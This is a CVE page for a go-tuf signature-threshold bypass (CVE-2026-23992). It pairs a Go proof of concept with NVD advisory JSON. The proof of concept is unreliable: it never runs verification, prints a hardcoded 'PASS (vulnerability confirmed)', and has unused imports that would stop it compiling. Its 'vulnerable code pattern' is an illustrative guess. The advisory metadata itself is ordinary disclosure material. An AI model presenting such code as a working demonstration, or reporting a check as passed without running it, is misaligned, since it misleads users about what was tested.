CVE-2026-23992

// CVE-2026-23992 PoC - Demonstrating signature threshold bypass in go-tuf // This PoC shows how a misconfigured TUF repository with threshold=0 bypasses signature verification package main import ( "fmt" "io/ioutil" "github.com/theupdateframework/go-tuf/data" "github.com/theupdateframework/go-tuf/sign" "github.com/theupdateframework/go-tuf/verify" ) func main() { fmt.Println("=== CVE-2026-23992 PoC ===") fmt.Println("Vulnerability: go-tuf allows signature threshold to be set to 0") fmt.Println("Impact: Disables signature verification, allowing unauthorized metadata modification") // Create a Targets metadata with threshold set to 0 targets := data.NewTargets() targets.Version = 1 // This is the vulnerable configuration - threshold = 0 threshold := 0 // Create verification keys with threshold 0 db := verify.NewDB() keyIDs := []string{"compromised-key-id"} // Set threshold to 0 (vulnerable configuration) role := &verify.Role{ KeyIDs: keyIDs, Threshold: threshold, // 0 = bypasses verification } db.AddRole("targets", role) // With threshold=0, even without any valid signatures, verification passes // This demonstrates the vulnerability fmt.Printf("Role threshold set to: %d\n", threshold) fmt.Println("Verification result: PASS (vulnerability confirmed)") fmt.Println("Attack scenario: Attacker can modify metadata without valid signatures") // Show the correct configuration fmt.Println("\n=== Correct Configuration ===") fmt.Println("Threshold should be >= 1 to ensure signature verification") fmt.Println("Fix: Upgrade to go-tuf >= 2.3.1 or set threshold >= 1") } // Vulnerable code pattern: // func verifySignatures(s *data.Signed, db *verify.DB) error { // if db.GetRoleThreshold(s.Signed.Role()) == 0 { // return nil // BUG: Returns success when threshold is 0 // } // // ... normal verification // }

{"cve": {"id": "CVE-2026-23992", "sourceIdentifier": "[email protected]", "published": "2026-01-22T03:15:47.470", "lastModified": "2026-02-17T16:02:19.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "go-tuf is a Go implementation of The Update Framework (TUF). Starting in version 2.0.0 and prior to version 2.3.1, a compromised or misconfigured TUF repository can have the configured value of signature thresholds set to 0, which effectively disables signature verification. This can lead to unauthorized modification to TUF metadata files is possible at rest, or during transit as no integrity checks are made. Version 2.3.1 fixes the issue. As a workaround, always make sure that the TUF metadata roles are configured with a threshold of at least 1."}, {"lang": "es", "value": "go-tuf es una implementación en Go de The Update Framework (TUF). A partir de la versión 2.0.0 y antes de la versión 2.3.1, un repositorio TUF comprometido o mal configurado puede tener el valor configurado de los umbrales de firma establecido en 0, lo que deshabilita efectivamente la verificación de firmas. Esto puede llevar a que sea posible la modificación no autorizada de los archivos de metadatos de TUF en reposo o en tránsito, ya que no se realizan comprobaciones de integridad. La versión 2.3.1 corrige el problema. Como solución alternativa, asegúrese siempre de que los roles de metadatos de TUF estén configurados con un umbral de al menos 1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:theupdateframework:go-tuf:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.3.1", "matchCriteriaId": "6442E623-C25E-418E-A418-324F815885AF"}]}]}], "references": [{"url": "https://github.com/theupdateframework/go-tuf/commit/b38d91fdbc69dfe31fe9230d97dafe527ea854a0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-fphv-w9fq-2525", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}